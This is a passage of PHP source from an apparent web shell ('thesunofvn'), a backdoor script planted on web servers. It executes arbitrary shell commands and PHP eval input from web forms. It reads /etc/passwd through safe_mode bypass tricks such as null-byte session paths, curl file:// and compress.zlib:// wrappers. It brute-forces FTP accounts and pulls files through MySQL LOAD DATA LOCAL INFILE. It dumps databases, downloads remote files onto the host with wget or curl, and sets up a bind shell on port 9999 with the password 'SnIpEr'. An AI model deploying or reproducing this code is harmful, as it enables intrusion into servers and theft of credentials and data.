  2399.                    if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}".$end_rlph)){echo $realpath."\r\n";}
  2400.                    if($n_rlph<=4){continue;};
  2401.                    for($z=0; $z < strlen($chars_rlph); $z++){
  2402.                       if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}".$end_rlph)){echo $realpath."\r\n";}
  2403.                       if($n_rlph<=5){continue;};
  2404.                       for($w=0; $w < strlen($chars_rlph); $w++){
  2405.                          if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}{$chars_rlph[$w]}".$end_rlph)){echo $realpath."\r\n";}
  2406.                       }
  2407.                    }
  2408.                  }
  2409.               }
  2410.           }
  2411.        }
  2412.        echo "\r\n Generation time: ".round(@getmicrotime()-starttime,4)." sec\r\n";
  2413.  break;
  2414. case 'test23':
  2415.   @session_save_path($_POST['test23_file2']."\0;$tempdir");
  2416.   @$_SESSION[php]=$_POST['test23_file1'];
  2417.   $filen=$_POST['test23_file2'];
  2418.     if(file_exists($filen))
  2419.     echo $lang[$language.'_text61']."  ".$filen;
  2420.     else
  2421.   echo "Can't write file";
  2422.   break;
  2423. case 'test24':
  2424. @putenv("TMPDIR=".$_POST['test24_file2']);
  2425.   @ini_set("session.save_path", "");
  2426.   @ini_alter("session.save_path", "");
  2427.   @$_SESSION[php]=$_POST['test24_file1'];
  2428.   $filen=$_POST['test24_file2'];
  2429.   if(file_exists($filen))
  2430.   echo $lang[$language.'_text61']."  ".$filen;
  2431.   else
  2432.   echo "Can't write file";
  2433.   break;
  2434. case 'test25':
  2435.   @readfile($_POST['test25_file1'], 3, "php://../../../../../../../../../../../".$_POST['test24_file2']);
  2436.   $filen=$_POST['test25_file2'];
  2437.   if(file_exists($filen))
  2438.   echo $lang[$language.'_text61'];
  2439.   else
  2440.   echo "Can't write file";
  2441.   break;
  2442.    case 'file1':
  2443. if(!empty($_POST['file1']))
  2444.  $file1=$_POST['file1'];
  2445.   $level=0;
  2446.   if(!file_exists("file1:"))
  2447.         mkdir("file1:");
  2448.   chdir("file1:");
  2449.   $level++;
  2450.   $hardstyle = explode("/", $file1);
  2451.   for($a=0;$a<count($hardstyle);$a++){
  2452.         if(!empty($hardstyle[$a])){
  2453.                 if(!file_exists($hardstyle[$a]))
  2454.                         mkdir($hardstyle[$a]);
  2455.                 chdir($hardstyle[$a]);
  2456.                 $level++;
  2457.         }
  2458.   }
  2459.   while($level--) chdir("..");
  2460.   $ch = curl_init();
  2461.   curl_setopt($ch, CURLOPT_URL, "file1:file1:///".$file1);
  2462.   if(FALSE==curl_exec($ch))
  2463.         die('>Sorry... File '.htmlspecialchars($file1).' doesnt exists or you dont have permissions.');
  2464.   curl_close($ch);
  2465. break;
  2466.   case 'file':
  2467. if(!empty($_POST['file']))
  2468.  $file=$_POST['file'];
  2469.   $level=0;
  2470.   if(!file_exists("file:"))
  2471.         mkdir("file:");
  2472.   chdir("file:");
  2473.   $level++;
  2474.   $hardstyle = explode("/", $file);
  2475.   for($a=0;$a<count($hardstyle);$a++){
  2476.         if(!empty($hardstyle[$a])){
  2477.                 if(!file_exists($hardstyle[$a]))
  2478.                         mkdir($hardstyle[$a]);
  2479.                 chdir($hardstyle[$a]);
  2480.                 $level++;
  2481.         }
  2482.   }
  2483.   while($level--) chdir("..");
  2484.   $ch = curl_init();
  2485.   curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
  2486.   if(FALSE==curl_exec($ch))
  2487.         die('>Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');
  2488.   curl_close($ch);
  2489. break;
  2490.  }
  2491. }
  2492. else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
  2493.  $cmd_rep = ex($_POST['cmd']);
  2494.  if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
  2495.  else { echo @htmlspecialchars($cmd_rep)."\n"; }}
  2496. if ($_POST['cmd']=="thesunofvn_mysql")
  2497.  {
  2498.   if(empty($_POST['test3_sr'])) { $_POST['test3_sr'] = "localhost"; }
  2499.   if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
  2500.   $db = @mysql_connect($_POST['test3_sr'].':'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
  2501.   if($db)
  2502.    {
  2503.    if(@mysql_select_db($_POST['test3_md'],$db))
  2504.     {
  2505.      @mysql_query("DROP TABLE IF EXISTS thesunofvn");
  2506.      @mysql_query("CREATE TABLE `thesunofvn` ( `file` LONGBLOB NOT NULL )");
  2507.      @mysql_query("LOAD DATA LOCAL INFILE \"".str_replace('\\','/',$_POST['test3_file'])."\" INTO TABLE thesunofvn FIELDS TERMINATED BY '' ESCAPED BY '' LINES TERMINATED BY '\n'");
  2508.      $r = @mysql_query("SELECT * FROM thesunofvn");
  2509.      while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
  2510.      @mysql_query("DROP TABLE IF EXISTS thesunofvn");
  2511.     }
  2512.     else echo "[-] ERROR! Can't select database";
  2513.    @mysql_close($db);
  2514.    }
  2515.   else echo "[-] ERROR! Can't connect to mysql server";
  2516.  }
  2517. if ($_POST['cmd']=="ftp_brute")
  2518.  {
  2519.  $suc = 0;
  2520.  foreach($users as $user)
  2521.   {
  2522.   $connection = @ftp_connect($ftp_server,$ftp_port,10);
  2523.   if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
  2524.   else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
  2525.   @ftp_close($connection);
  2526.   }
  2527.  echo "\r\n-------------------------------------\r\n";
  2528.  $count = count($users);
  2529.  if(isset($_POST['reverse'])) { $count *= 2; }
  2530.  echo $lang[$language.'_text97'].$count."\r\n";
  2531.  echo $lang[$language.'_text98'].$suc."\r\n";
  2532.  }
  2533. if ($_POST['cmd']=="php_eval"){
  2534.  $eval = @str_replace("<?","",$_POST['php_eval']);
  2535.  $eval = @str_replace("?>","",$eval);
  2536.  @eval($eval);}
  2537. if ($_POST['cmd']=="mysql_dump")
  2538.  {
  2539.   if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
  2540.   $sql = new my_sql();
  2541.   $sql->db   = $_POST['db'];
  2542.   $sql->host = $_POST['db_server'];
  2543.   $sql->port = $_POST['db_port'];
  2544.   $sql->user = $_POST['mysql_l'];
  2545.   $sql->pass = $_POST['mysql_p'];
  2546.   $sql->base = $_POST['mysql_db'];
  2547.   if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
  2548.   else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
  2549.   else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
  2550.   else {
  2551.    if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
  2552.    else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
  2553.    else { echo "[-] ERROR! Can't write in dump file"; }
  2554.    }
  2555.  }
  2556. echo "</textarea></div>";
  2557. echo "</b>";
  2558. echo "</td></tr></table>";
  2559. echo "<table width=100% cellpadding=0 cellspacing=0>";
  2560. function div_title($title, $id)
  2561. {
  2562.   return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
  2563. }
  2564. function div($id)
  2565.  {
  2566.  if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
  2567.  return '<div id="'.$id.'">';
  2568.  }
  2569. if(!$safe_mode){
  2570. echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
  2571. echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
  2572. echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
  2573. echo $te.'</div>'.$table_end1.$fe;
  2574. }
  2575. else{
  2576. echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
  2577. echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
  2578. echo $te.'</div>'.$table_end1.$fe;
  2579. echo $fs.$table_up1.div_title($lang[$language.'_text224'],'id511').$table_up2.div('id511').$ts;
  2580. echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>","<select size=\"1\" name=\"plugin\"><option value=\"plugin\">/etc/passwd</option></option></select>".in('hidden','cmd',0,'plugin').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
  2581. echo $te.'</div>'.$table_end1.$fe;
  2582. }
  2583. if($safe_mode){
  2584. echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
  2585. echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):(""))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
  2586. echo $te.'</div>'.$table_end1.$fe;
  2587. echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts;
  2588. echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):(""))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0755"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
  2589. echo $te.'</div>'.$table_end1.$fe;
  2590. }
  2591. echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
  2592. echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
  2593. echo $te.'</div>'.$table_end1.$fe;
  2594. echo $fs.$table_up1.div_title($lang[$language.'_text207'],'id207').$table_up2.div('id207').$ts;
  2595. echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','glob',85,'/etc/').in('hidden','cmd',0,'glob').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
  2596. echo $te.'</div>'.$table_end1.$fe;
  2597. echo $fs.$table_up1.div_title($lang[$language.'_text209'],'id209').$table_up2.div('id209').$ts;
  2598. echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','root',85,'/etc/').in('hidden','cmd',0,'root').in
  2599. ('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
  2600. echo $te.'</div>'.$table_end1.$fe;
  2601. echo $fs.$table_up1.div_title($lang[$language.'_text200'],'id3').$table_up2.div('id3').$ts;
  2602. echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','snn',85,'/etc/passwd').in('hidden','cmd',0,'copy').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
  2603. echo $te.'</div>'.$table_end1.$fe;
  2604. echo $fs.$table_up1.div_title($lang[$language.'_text203'],'id411').$table_up2.div('id411').$ts;
  2605. echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','ini_restore',85,'/etc/passwd').in('hidden','cmd',0,'ini_restore').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
  2606. echo $te.'</div>'.$table_end1.$fe;
  2607. echo $fs.$table_up1.div_title($lang[$language.'_text125'],'id2900').$table_up2.div('id2900').$ts;
  2608. echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test19',85,'/etc/passwd').in('hidden','cmd',0,'test19').in
  2609. ('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
  2610. echo $te.'</div>'.$table_end1.$fe;
  2611. echo $fs.$table_up1.div_title($lang[$language.'_text127'],'id2901').$table_up2.div('id2901').$ts;
  2612. echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','file',85,'/etc/passwd').in
  2613. ('hidden','cmd',0,'file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
  2614. echo $te.'</div>'.$table_end2.$fe;
  2615. echo $table_up1.div_title($lang[$language.'_text131'],'id2902').$table_up2.div('id2902').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
  2616. echo "<font face=tahoma size=-2><b><div align=center id='n'>Read File</div></b></font>";
  2617. echo sr(25,"<b>File :".$arrow."</b>",in('text','file1',40,(!empty($_POST['file1']))?($_POST['file1']):("/etc/passwd")).in('submit','submit',2,"Read File"));
  2618. function rsg_read()
  2619.         {      
  2620.         $test="";
  2621.         $temp=tempnam($test, "cx");
  2622.         $file1=$_POST['file1'];
  2623.         $get=htmlspecialchars($file1);
  2624.         echo "<center><br><b><font size=2>Trying To Get File <font color=red><b>$get</b></font><br>";
  2625.         if(copy("compress.zlib://".$file1, $temp)){
  2626.         $fichier = fopen($temp, "r");
  2627.         $action = fread($fichier, filesize($temp));
  2628.         fclose($fichier);
  2629.         $source=htmlspecialchars($action);
  2630. echo "<div align=\"center\"><b><font size=2><br><font color=\"red\"><textarea name=report cols=60 rows=10>$source</textarea><br><b><br>Found <b><font size=2>$get</font></b>";
  2631.         unlink($temp);
  2632.         } else {
  2633.         die("<b><font size=2><CENTER>Sorry... File
  2634.         <font color=red><B>".htmlspecialchars($file1)."</B></font> dosen't exists or you don't have
  2635.         access.</CENTER></FONT>");
  2636.                         }
  2637.         echo "</div>";
  2638.         }
  2639. if(isset($_POST['file1']))
  2640. {
  2641. rsg_read();
  2642. }
  2643. echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
  2644. echo "<font face=tahoma size=-2><b><div align=center id='n'>View Dir</div></b></font>";
  2645. echo sr(20,"<b>Dir :".$arrow."</b>",in('text','directory',40,(!empty($_POST['directory']))?($_POST['directory']):("/etc")).in('submit','submit',2,'View'));
  2646. function rsg_glob()
  2647. {
  2648. $chemin=$_POST['directory'];
  2649. $files = glob("$chemin*");
  2650. echo "<center><b><font size=2>Trying To List Folder <font color=red><b>$chemin</b></font><br>";
  2651. echo "<textarea cols=60 rows=10>";
  2652. foreach ($files as $filename) {
  2653.            echo "$filename\n";
  2654.            }echo "</textarea></center>";
  2655.            }
  2656. if(isset($_POST['directory']))
  2657. {
  2658. rsg_glob();
  2659. }
  2660. echo $te."</td>".$fe."</tr></div></table>";
  2661. echo $fs.$table_up1.div_title($lang[$language.'_text210'],'id210').$table_up2.div('id210').$ts;
  2662. echo "<table class=table1 width=100% align=center>";
  2663. echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','zend',85,(!empty($_POST['zend'])
  2664. ?($_POST['zend']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'zend').ws(4).in
  2665. ('submit','submit',0,$lang[$language.'_butt8']));
  2666. echo $te.'</div>'.$table_end1.$fe;
  2667. if(extension_loaded("ionCube Loader"))
  2668. {
  2669. echo $fs.$table_up1.div_title($lang[$language.'_text230'],'id230').$table_up2.div('id230').$ts;
  2670. echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test14_cmd',96,(!empty($_POST['test14_cmd'])?($_POST['test14_cmd']):(''))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test14').in('submit','submit',0,$lang[$language.'_butt8']));
  2671. echo $te.'</div>'.$table_end1.$fe;  
  2672. }
  2673. if($unix&&extension_loaded("win32std"))
  2674. {
  2675. echo $fs.$table_up1.div_title($lang[$language.'_text231'],'id231').$table_up2.div('id231').$ts;
  2676. echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test15_cmd',96,(!empty($_POST['test15_cmd'])?($_POST['test15_cmd']):('dir'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test15').in('submit','submit',0,$lang[$language.'_butt8']));
  2677. echo $te.'</div>'.$table_end1.$fe;  
  2678. }
  2679. if($unix&&extension_loaded("win32service"))
  2680. {
  2681. echo $fs.$table_up1.div_title($lang[$language.'_text232'],'id232').$table_up2.div('id232').$ts;
  2682. echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test16_cmd',96,(!empty($_POST['test16_cmd'])?($_POST['test16_cmd']):('dir'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test16').in('submit','submit',0,$lang[$language.'_butt8']));
  2683. echo $te.'</div>'.$table_end1.$fe;  
  2684. }
  2685. if($unix&&extension_loaded("ffi"))
  2686. {
  2687. echo $fs.$table_up1.div_title($lang[$language.'_text132'],'id35').$table_up2.div('id234').$ts;
  2688. echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test18_cmd',96,(!empty($_POST['test18_cmd'])?($_POST['test18_cmd']):('dir'))).ws(4).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test18').in('submit','submit',0,$lang[$language.'_butt8']));
  2689. echo $te.'</div>'.$table_end1.$fe;  
  2690. }
  2691. $aliases2 = '';
  2692. foreach ($aliases as $alias_name=>$alias_cmd)
  2693.  {
  2694.  $aliases2 .= "<option>$alias_name</option>";
  2695.  }
  2696. echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts;
  2697. echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
  2698. echo $te.'</div>'.$table_end1.$fe;
  2699. echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts;
  2700. echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
  2701. echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ");
  2702. echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.php;.asp;.aspx;.cfm')."*".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
  2703. echo $te.'</div>'.$table_end1.$fe;
  2704. if($curl_on)
  2705. {
  2706. echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts;
  2707. echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
  2708. echo $te.'</div>'.$table_end1.$fe;
  2709. echo $fs.$table_up1.div_title($lang[$language.'_text300'],'id3').$table_up2.div('id3').$ts;
  2710. echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','ly0kha',85,'/etc/passwd').in('hidden','cmd',0,'cURL').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
  2711. echo $te.'</div>'.$table_end1.$fe;
  2712. }
  2713. if($mssql_on)
  2714. {
  2715. echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts;
  2716. echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):(""))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
  2717. echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
  2718. echo $te.'</div>'.$table_end1.$fe;
  2719. }
  2720. echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font;
  2721. echo "<div align=center>".div('id9')."<textarea name=php_eval cols=120 rows=5>";
  2722. echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\nunlink(\"thesunofvn.php\");\r\nreadfile(\"/etc/passwd\");\r\necho file_get_contents(\"/etc/passwd\");\r\npassthru(\"ln -s /etc/passwd sun.txt\");"));
  2723. echo "</textarea>";
  2724. echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
  2725. echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
  2726. echo "</div></div></font>";
  2727. echo $table_end1.$fe;
  2728. {
  2729. echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
  2730. echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts;
  2731. echo "<tr><td valign=top width=50%>".$ts;
  2732. echo sr(10,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile0',70,''));
  2733. echo sr(10,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile1',70,''));
  2734. echo sr(10,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile2',70,''));
  2735. echo $te."</td><td valign=top width=50%>".$ts;
  2736. echo sr(10,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile3',70,''));
  2737. echo sr(10,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile4',70,''));
  2738. echo sr(10,'',in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
  2739. echo $te."</td></tr>";
  2740. echo $te.'</div>'.$table_end1.$fe;
  2741. }
  2742. if(!$safe_mode&&$unix){
  2743. echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts;
  2744. echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
  2745. echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
  2746. echo $te.'</div>'.$table_end1.$fe;
  2747. }
  2748. echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts;
  2749. echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
  2750. $arh = $lang[$language.'_text92'];
  2751. if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
  2752. if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
  2753. if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
  2754. echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
  2755. echo $te.'</div>'.$table_end1.$fe;
  2756. if($unix && @function_exists("ftp_connect")){
  2757. echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts;
  2758. echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):(""))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
  2759. echo sr(15,"","<font face=tahoma size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
  2760. echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
  2761. echo $te.'</div>'.$table_end1.$fe;
  2762. }
  2763. if($mysql_on||$mssql_on||$pg_on||$ora_on)
  2764. {
  2765. $select = '<select name=db>';
  2766. if($mysql_on) $select .= '<option>MySQL</option>';
  2767. if($mssql_on) $select .= '<option>MSSQL</option>';
  2768. if($pg_on)    $select .= '<option>PostgreSQL</option>';
  2769. if($ora_on)   $select .= '<option>Oracle</option>';
  2770. $select .= '</select>';
  2771. echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
  2772. echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
  2773. echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
  2774. echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
  2775. echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):(""))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):(""))));
  2776. echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):(""))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):(""))));
  2777. echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
  2778. echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
  2779. echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
  2780. echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
  2781. echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
  2782. echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
  2783. echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):(""))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):(""))));
  2784. echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):(""))));
  2785. echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
  2786. echo $te."<div align=center id='n'><textarea cols=75 rows=2 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\r\n#create table thesunofvn (mt varchar(1024));\r\n#load data local infile '/etc/passwd' into table thesunofvn;\r\n#update table set column='value what you want' where column=number;\r\n#insert table ('column','column') VALUES (number,'value');"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
  2787. }
  2788. if($unix){
  2789. echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
  2790. echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
  2791. echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'9999'));
  2792. echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'SnIpEr'));
